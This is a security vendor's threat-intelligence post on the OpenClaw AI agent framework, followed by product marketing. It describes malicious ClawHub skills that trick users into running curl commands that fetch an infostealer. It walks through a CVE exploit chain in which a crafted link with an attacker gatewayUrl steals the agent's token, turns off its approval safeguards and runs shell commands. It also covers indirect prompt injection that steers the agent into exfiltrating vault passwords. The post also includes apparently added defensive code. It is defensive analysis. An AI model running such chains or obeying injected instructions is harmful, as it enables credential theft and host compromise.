Exploiting the OpenClaw Agentic Loop

February 16, 2026

The AI assistant that promised to revolutionize personal productivity is more of a cautionary tale about security in the age of artificial intelligence. In late 2025, a shift occurred that signaled a new species of software: OpenClaw. OpenClaw, formerly known as Moltbot and Clawdbot, is an open-source framework that acts as a digital assistant, simplifying your digital work and personal life.

OpenClaw is gaining quick adoption by users who want to automate their workflows. Recent data from Token Security indicates that 22% of surveyed organizations have employees actively using Clawdbot (OpenClaw). In reality, however, OpenClaw introduces significant security risks to users and their devices. Since the personal AI assistant can operate with legitimate corporate OAuth tokens and API keys, it is a silent, high-impact entry point for credential theft and lateral movement within the enterprise.

What is OpenClaw and Why Does It Matter?

OpenClaw's security risks stem directly from its architecture. Instead of residing on remote company servers like standard AI assistants, OpenClaw operates locally on the user's laptop or private server as a persistent, 24/7 background service. This constant activity essentially maintains a permanent gateway on the user's network that attackers could exploit. Specifically, the application runs as a Node.js-based daemon, typically binding to TCP port 18789. By remaining active even when not in use, this gateway provides adversaries with a continuous, round-the-clock attack surface. Prior to OpenClaw version 2026.1.29, the gateway could be configured to bind to external or all interfaces without requiring authentication; that combination is now prohibited.

How OpenClaw Stores Your Life

OpenClaw keeps a "long-term memory" by saving your settings, chat histories, and habits in plain-text markdown (.md) files such as “MEMORY.md” or “SOUL.md”. These files reside in predictable locations, often within the ~/.clawdbot/ or ~/.openclaw/ directories. While this makes the system transparent and easy to control, it also creates a high-risk map of your digital identity. To a cybercriminal, these files are a blueprint for impersonation, containing your private conversations and sensitive project details in a format that is very easy to read and steal.

Capabilities and the Clawhub Marketplace

OpenClaw is not just a chatbot; it functions as a digital assistant with administrative reach. It uses packages called "skills", found on the OpenClaw marketplace, ClawHub, to execute tasks. These "skills" allow the OpenClaw agent to perform tasks such as reading and sending emails, browsing websites and filling out forms, and executing commands on your behalf, including interacting with secure software. Its primary appeal lies in its ability to automate multi-step workflows that previously required human interaction.

The appeal of OpenClaw's "hands-off" automation has resonated strongly with users, leading to viral adoption within the OpenClaw community. This momentum is best illustrated by the rapid expansion of the ClawHub marketplace. In the first week of February 2026, the ClawHub marketplace listed approximately 3,000 skills. As of February 13, 2026, that number has increased 200% to over 9,000 skills. This counts only skills listed on ClawHub and does not take into account other pastebin-type sites where "skill" files can be stored, such as glot[.]io.

OpenClaw's rapid adoption, achieving this growth in less than two weeks, indicates its nature as a platform, not merely a tool. By allowing third-party developers to contribute to its "administrative reach," OpenClaw is rapidly building a library of automations that could soon cover nearly every repeatable digital task in the modern workplace.

The Agentic Loop: From Thinking to Doing

OpenClaw differentiates itself from standard chatbots through an Agentic Loop. It uses the Playwright library for browser automation, allowing the agent to interact with websites much as a human would. By connecting this to large language models (LLMs) such as GPT-4 or Claude, the agent decides on a goal, executes a step via a terminal or browser, and feeds the result back into its memory. It does not just suggest code; it runs it. It does not just draft an email; it sends it.

This autonomy relies on three pillars: persistent memory, deep local access, and the ability to trigger actions without receiving input from a human. However, the framework’s documentation admits to a "Faustian bargain": users must often abandon traditional security constraints to enable these features. The agent frequently stores transcripts, "skills," and authentication tokens in predictable plain-text files on disk so the agent can easily read them. This creates a "pot of gold" for infostealers, allowing attackers to exfiltrate a user's entire digital life in seconds.

The Key Difference between Generative AI and OpenClaw: Most generative AI integrations can assist in tasks like drafting an email; OpenClaw sends it. Generative AI assistance can also suggest code; OpenClaw runs it. OpenClaw decides on a step, executes it, and learns from the result without needing you to chime in.

Claw 1: Weaponizing "Skills" on ClawHub

The threat landscape extends beyond software vulnerabilities to active supply-chain attacks. Business Insights Cybersecurity reported that the Clawhub marketplace hosted close to 900 malicious "skills", which was 20% of the total "skills" offered as of February 05, 2026. The largest malicious “skills” supply-chain campaign, referred to as "ClawHavoc", utilizes a social engineering methodology similar to the “ClickFix” technique. These malicious skills masquerade as utility tools relating to cryptocurrency, social media, and YouTube. When a user attempted to install the skill, the OpenClaw agent would output a simulated error message or a "verification requirement" stating that an additional component was needed for compatibility.

The most common of these prerequisites is "AuthTool". Users were provided with a specific terminal command, claiming it was necessary to fix the environment. On macOS systems, these commands often involved a curl call to a remote host (frequently glot.io or a GitHub Gist) that downloaded a multi-stage shell script. This script would decode an obfuscated payload to install the Atomic macOS Stealer (AMOS), a commodity infostealer designed to raid browser data, crypto wallets, and password manager vaults. Windows users were similarly targeted with instructions to download password-protected ZIP archives containing trojanized binaries.

The structural vulnerability of the OpenClaw “skill” ecosystem lies in the collapse of the line between documentation and execution. Users and OpenClaw agents both treat skill instructions as authoritative installers. In an agentic loop, the OpenClaw agent may autonomously decide to "fix" an installation error by executing the very commands that lead to compromise.

Claw 2: The “1-Click” Vulnerability

The most immediate threat to the OpenClaw ecosystem is a critical vulnerability identified as CVE-2026-25253, which enables a "1-click" remote code execution (RCE) attack. By design, the OpenClaw frontend accepts a gatewayUrl parameter via a query string. Researchers discovered that the application blindly trusts this parameter and automatically establishes a WebSocket connection to that URL on page load without any user confirmation.

The attack occurs in milliseconds once a user clicks a crafted malicious link, such as https[:]//openclaw[.]app/?gatewayUrl=wss[:]//attacker-server[.]com. The OpenClaw frontend blindly trusts the user-supplied URL and initiates an automatic WebSocket connection. During the standard WebSocket handshake, the application is programmed to bundle the user's administrative authToken into the connection payload to facilitate seamless reconnection. Since the connection is redirected to an attacker-controlled server, the adversary captures the token required to impersonate the administrator of the local gateway.

Once the token is exfiltrated, the attacker performs a Cross-Site WebSocket Hijacking (CSWSH) attack. Because the OpenClaw WebSocket server lacks proper origin validation, the attacker can use the stolen token to connect back to the victim's local instance (typically at ws[:]//localhost:18789) directly from the browser. This bypasses traditional firewall protections by using the victim's own browser as a bridge into the internal network.

The exploit follows this sequence:

  1. Token Theft: A victim clicks a crafted link containing a malicious gatewayUrl. The OpenClaw instance immediately connects to the attacker’s server and automatically bundles the user's sensitive authToken in the handshake.
  2. WebSocket Hijacking (CSWSH): Because the OpenClaw server fails to validate the Origin header, the attacker uses the stolen token to connect to the victim's local instance (e.g., ws[:]//localhost:18789) directly from a malicious website.
  3. Sandbox Escape: Using the token's administrative scopes, the attacker disables safety guardrails via the exec.approvals.set API and forces the agent to run commands on the host machine instead of a containerized sandbox.
  4. Full Execution: The attacker executes a node.invoke request to run arbitrary shell commands, gaining complete control of the host system.

Although the CVE-2026-25253 vulnerability was patched in OpenClaw version 2026.01.29, researchers identified over 17,500 vulnerable instances of OpenClaw (and its predecessors) as of February 03, 2026.
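As an added example (not OpenClaw's own code, and not the project's actual patch), these are the checks a fix for this class of bug has to make: the frontend refusing a gatewayUrl that is not on an allow-list before any handshake (and therefore before any token) is sent, the gateway rejecting WebSocket upgrades whose Origin is not its own UI, and the startup guard that refuses an external bind without authentication. Function names, the allow-list, and the default gateway address are assumptions.

```javascript
// Added example: defensive handling of a gateway URL taken from a query string,
// Origin validation for the WebSocket gateway, and a bind-address guard.
// Assumed: DEFAULT_GATEWAY, ALLOWED_GATEWAY_HOSTS and the function names below.
const DEFAULT_GATEWAY = "ws://127.0.0.1:18789"; // port from the article; default address is an assumption

// Hosts the frontend may be told to connect to. Anything else is rejected rather
// than trusted, so a crafted link cannot redirect the handshake (and the token it
// would carry) to a server the user did not choose.
const ALLOWED_GATEWAY_HOSTS = new Set(["localhost", "127.0.0.1", "[::1]"]);

function parseGatewayUrl(queryString) {
  const raw = new URLSearchParams(queryString).get("gatewayUrl");
  if (raw === null) return { ok: true, url: DEFAULT_GATEWAY, reason: "default" };
  let u;
  try { u = new URL(raw); } catch { return { ok: false, reason: "unparseable" }; }
  // Only WebSocket schemes; rules out http:, javascript:, file: and friends.
  if (u.protocol !== "ws:" && u.protocol !== "wss:") return { ok: false, reason: "scheme" };
  if (!ALLOWED_GATEWAY_HOSTS.has(u.hostname)) return { ok: false, reason: "host" };
  return { ok: true, url: u.href, reason: "allow-listed" };
}

// Server side: a browser always sends an Origin header on a WebSocket upgrade.
// An absent or foreign Origin means the upgrade did not come from the gateway's
// own UI, which is exactly the cross-site hijacking case; reject it.
function isOriginAllowed(headers, allowedOrigins) {
  const origin = headers["origin"]; // Node lower-cases incoming header names
  if (typeof origin !== "string") return false;
  return allowedOrigins.has(origin);
}

// Startup guard matching the post-2026.1.29 behaviour the article describes:
// a non-loopback bind is only permitted when authentication is required.
function checkBind(bindHost, authRequired) {
  const loopback = bindHost === "127.0.0.1" || bindHost === "::1" || bindHost === "localhost";
  if (loopback || authRequired) return { ok: true };
  return { ok: false, reason: "external bind without authentication" };
}

module.exports = { DEFAULT_GATEWAY, parseGatewayUrl, isOriginAllowed, checkBind };
```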

Claw 3: User Credentials

The risk to vaulted credentials in managers like 1Password or LastPass is especially concerning when users install "skills" designed to bridge the OpenClaw agent with their password vaults. As of February 04, 2026, there were over 125 skills requesting private keys or passwords, including master passwords for password managers, YubiKey one-time passwords (OTPs), Azure client secrets, Stripe secret keys, and blockchain wallet keys.

While these integrations promise productivity, they collapse the critical security boundary between untrusted web content and sensitive authentication data. Despite OpenClaw's attempts to sanitize external inputs, these defenses are easily bypassed. Because OpenClaw can reason over and act on external inputs, it is highly susceptible to indirect prompt injection: an attacker can embed hidden instructions in a webpage or email that, when processed by the agent, trigger a command to retrieve a password from the vault and exfiltrate it to a remote server.

These credentials are loaded directly into the agent’s runtime. Combined with 179 skills that download unsigned, password-protected binaries from random GitHub repositories, this creates a perfect storm of unvetted code, high-value credentials, and agents that can be remotely controlled via poisoned content.

Network Detection and Response

Traditional security tools, such as firewalls and endpoint detection and response (EDR), may not reliably account for the deep local access and autonomous execution capabilities of agentic frameworks like OpenClaw. These tools frequently rely on host-based logs or agents that adversaries can bypass by exploiting the framework's inherent architectural requirements. To enable full agent autonomy, users must often abandon traditional security constraints, creating a gap in host-resident visibility. The constraints given up include sandboxing and execution isolation, user oversight (by disabling approval prompts), encrypted storage, and more.

The ExtraHop RevealX platform addresses these challenges by providing a real-time view of activity across the network without relying on local system data.

  • Deep Decryption and Protocol Fluency: RevealX removes the barrier of encryption by decrypting traffic at line rates up to 100 Gbps. It natively decodes more than 90 protocols in real time, including modern standards like TLS 1.3 and internal protocols like Kerberos and SMBv3. This wire-speed analysis eliminates blind spots and provides immediate insight into complex traffic streams that other tools often miss.
  • AI-Driven Behavioral Detection: RevealX automatically learns and baselines normal behavior for every device and user by profiling thousands of network metrics. The platform uses cloud-scale AI to identify those deviations that indicate various attacker activities. This behavioral approach allows the platform to trigger high-confidence alerts for anomalous activities such as lateral movement or unauthorized data exfiltration.
  • Unified Context: RevealX consolidates network detection (NDR), performance management (NPM), intrusion detection (IDS), and forensics into a single platform. It provides comprehensive visibility across the entire attack chain, from reconnaissance to command and control. This unified data set also allows teams to identify and resolve network performance issues without switching tools.
  • Forensics and Response Integration: Continuous network recording allows security teams to trace the full path of an attack from initial entry to final execution. RevealX enriches alerts with deep network context and immutable packet-level evidence to enable precise response actions. Integrated workflows put analysts just three clicks away from the root cause and the precise packets that prove it.

Securing against OpenClaw requires a strategy that combines automated alerts with proactive investigation. While the platform identifies general behavioral categories, specific exploitation is caught by Suspicious Web Request and Long-lived Connection detections. To close this visibility gap, security teams can use the ExtraHop Query Language (EQL) as a precision tool to hunt for specific application fingerprints. Detections signal that an attack is occurring, while EQL allows analysts to trace the full path and confirm exactly what occurred once access was gained.

Table - OpenClaw TTP Table Mapped to ExtraHop NDR Capability

Conclusions

The rapid adoption of tools like OpenClaw demonstrates a genuine demand for AI-driven productivity. However, the first wave of agentic security has shown that adoption has far outpaced the hardening of the underlying infrastructure. As these autonomous assistants move from suggestion to direct execution, they break traditional security boundaries by requiring deep local access and the abandonment of standard constraints like sandbox isolation and user oversight. This architectural model, while efficient, introduces a persistent 24 x 7 attack surface that operates as an unmanaged gateway into the enterprise, often with the same authority as a legitimate user.

To address these emerging risks, organizations must move beyond a reliance on host-resident visibility and implement strict network controls that treat every agent as a potential vector for compromise. By using NDR platforms like ExtraHop RevealX to monitor for anomalous behavior, security teams can identify the specific network signatures of agentic exploitation in real time. Maintaining a proactive view of the network allows organizations to realize the promise of autonomous assistants without surrendering the keys to their digital identity.

Recommendations

While the risks of agentic AI are not insurmountable, managing them requires a proactive strategy that goes beyond merely blocking their use. It is crucial to understand the potential risks to your network and assets if you opt to allow agentic AI.

Governance and Visibility: The primary risk of OpenClaw is that it is "invisible" to IT. Organizations should implement continuous asset discovery focused on port 18789 and the OpenClaw or Clawdbot process names. Establishing a clear policy on "Bring Your Own AI" (BYOAI) is essential, as research indicates that 22% of organizations already have these agents active on their networks.

Mandatory Patching: Upgrade all OpenClaw, Moltbot, and Clawdbot instances to version 2026.1.29 or later immediately.

Network-Level Isolation: Agentic assistants should be treated as untrusted IoT devices. If OpenClaw is permitted for research or development purposes, it should be run in an isolated VLAN with no direct access to the management subnet or internal secret stores.

"Skills" Vetting and Least Privilege Permissions: The supply chain risks of ClawHub require a zero-trust approach to "skills." Users should be prevented from granting "God Mode" permissions to their agents. Organizations should consider allow-listing specific, internally audited "skills" and blocking outbound terminal commands from the agent process using host-based firewalls or EDR policies.

Continuous Monitoring for Behavioral Drift: Because the OpenClaw agent’s behavior is autonomous, defenders must look for behavior anomalies. If an agent that normally interacts only with Slack suddenly starts scanning the internal network for SMB shares or exfiltrating “.md” files to a new destination, this should be treated as highly suspicious and be investigated. Integrating NDR telemetry with SIEM logs is critical to "connecting the dots" between a user clicking a link and a subsequent credential exfiltration event.
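The exposure and behavioral-drift checks described in the Governance and Continuous Monitoring recommendations above, as an added example that is neither ExtraHop's nor OpenClaw's code: three rules run over constructed flow records (a gateway on port 18789 reachable from off-host, a memory ".md" file sent to a destination the agent host never used before, and SMB fan-out to hosts outside the baseline). The record fields, hostnames, addresses and thresholds are assumptions.

```javascript
// Added example: exposure and drift rules over constructed flow records.
// Assumed: record shape {t, src, dst, dport, uri}, host names, and thresholds.
const GATEWAY_PORT = 18789;   // OpenClaw gateway port from the article
const SMB_PORT = 445;
const SMB_FANOUT = 5;         // distinct new SMB peers before we call it a scan
const LOOPBACK = new Set(["127.0.0.1", "::1"]);

// Constructed records. Agent host 10.0.5.21 normally talks only to Slack and
// its own gateway (t < 10 is the baseline window); later records show drift.
const FLOWS = [
  { t: 1,  src: "10.0.5.21",    dst: "slack.example",  dport: 443,          uri: "/api/chat" },
  { t: 2,  src: "127.0.0.1",    dst: "10.0.5.21",      dport: GATEWAY_PORT, uri: "/" },
  { t: 3,  src: "10.0.5.21",    dst: "slack.example",  dport: 443,          uri: "/api/chat" },
  { t: 10, src: "198.51.100.7", dst: "10.0.5.21",      dport: GATEWAY_PORT, uri: "/" },
  { t: 11, src: "10.0.5.21",    dst: "10.0.6.1",       dport: SMB_PORT,     uri: "" },
  { t: 12, src: "10.0.5.21",    dst: "10.0.6.2",       dport: SMB_PORT,     uri: "" },
  { t: 13, src: "10.0.5.21",    dst: "10.0.6.3",       dport: SMB_PORT,     uri: "" },
  { t: 14, src: "10.0.5.21",    dst: "10.0.6.4",       dport: SMB_PORT,     uri: "" },
  { t: 15, src: "10.0.5.21",    dst: "10.0.6.5",       dport: SMB_PORT,     uri: "" },
  { t: 16, src: "10.0.5.21",    dst: "paste.example",  dport: 443,          uri: "/upload/MEMORY.md" },
];

// Learn, per source host, the set of destinations seen before the cutoff.
function baselineDestinations(flows, cutoff) {
  const base = new Map();
  for (const f of flows) {
    if (f.t >= cutoff) continue;
    if (!base.has(f.src)) base.set(f.src, new Set());
    base.get(f.src).add(f.dst);
  }
  return base;
}

// Apply the three rules to records at or after the cutoff; returns alerts.
function detect(flows, cutoff) {
  const base = baselineDestinations(flows, cutoff);
  const smbPeers = new Map();
  const alerts = [];
  for (const f of flows) {
    if (f.t < cutoff) continue;
    // Rule 1: gateway port reached from anything other than its own host.
    if (f.dport === GATEWAY_PORT && !LOOPBACK.has(f.src) && f.src !== f.dst)
      alerts.push({ rule: "gateway-exposed", host: f.dst, peer: f.src });
    const isNew = !(base.get(f.src) || new Set()).has(f.dst);
    // Rule 2: a memory/transcript .md file sent to a never-seen destination.
    if (isNew && /\.md$/i.test(f.uri))
      alerts.push({ rule: "md-exfil", host: f.src, peer: f.dst });
    // Rule 3: SMB connections fanning out to many previously unseen hosts.
    if (f.dport === SMB_PORT && isNew) {
      if (!smbPeers.has(f.src)) smbPeers.set(f.src, new Set());
      const peers = smbPeers.get(f.src);
      peers.add(f.dst);
      if (peers.size === SMB_FANOUT)
        alerts.push({ rule: "smb-scan", host: f.src, peer: `${peers.size} hosts` });
    }
  }
  return alerts;
}

module.exports = { FLOWS, baselineDestinations, detect };
```

With the baseline cut at t = 10, the constructed records yield one alert per rule; widening the baseline to cover every record yields none, which is the drift idea in miniature.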

Learn More About ExtraHop

The network usually tells the story that logs and endpoints often miss. If you want to see how this actually works in practice, or if you're just curious about how your own environment holds up, there are a few ways we can help:

  • See it in action: We can jump on a quick call to show you exactly how RevealX picks up on the TTPs used by threat actors.
  • Check your blind spots: We offer a simple network security assessment to help you find out if there’s activity moving sideways through your environment that your current tools aren't catching.
  • Your experts speak with our experts: If you have specific questions about OpenClaw your team can spend time with ours.

Click HERE to schedule your time with us and learn more about ExtraHop NDR.

Sources:

  1. https://www.functionize.com/blog/the-agentic-loop-reimagining-the-future-of-qa
  2. https://1password.com/blog/its-openclaw
  3. https://businessinsights.bitdefender.com/technical-advisory-openclaw-exploitation-enterprise-networks
  4. https://depthfirst.com/post/1-click-rce-to-steal-your-moltbot-data-and-keys
  5. https://hunt.io/blog/cve-2026-25253-openclaw-ai-agent-exposure
  6. https://www.cyera.com/research-labs/the-openclaw-security-saga-how-ai-adoption-outpaced-security-boundaries
  7. https://medium.com/@MaanVader/agent-vs-agent-how-i-used-chack-to-audit-openclaw-and-uncover-10-critical-flaws-f799b313bd1c#4985
Angela Wilson

Senior Cyber Threat Intelligence Analyst

Angela Wilson is a Senior Cyber Threat Intelligence Analyst with over a decade of experience in the cybersecurity industry. She focuses on transforming complex threat data into strategic intelligence that enhances organizational resilience and informs proactive defense.
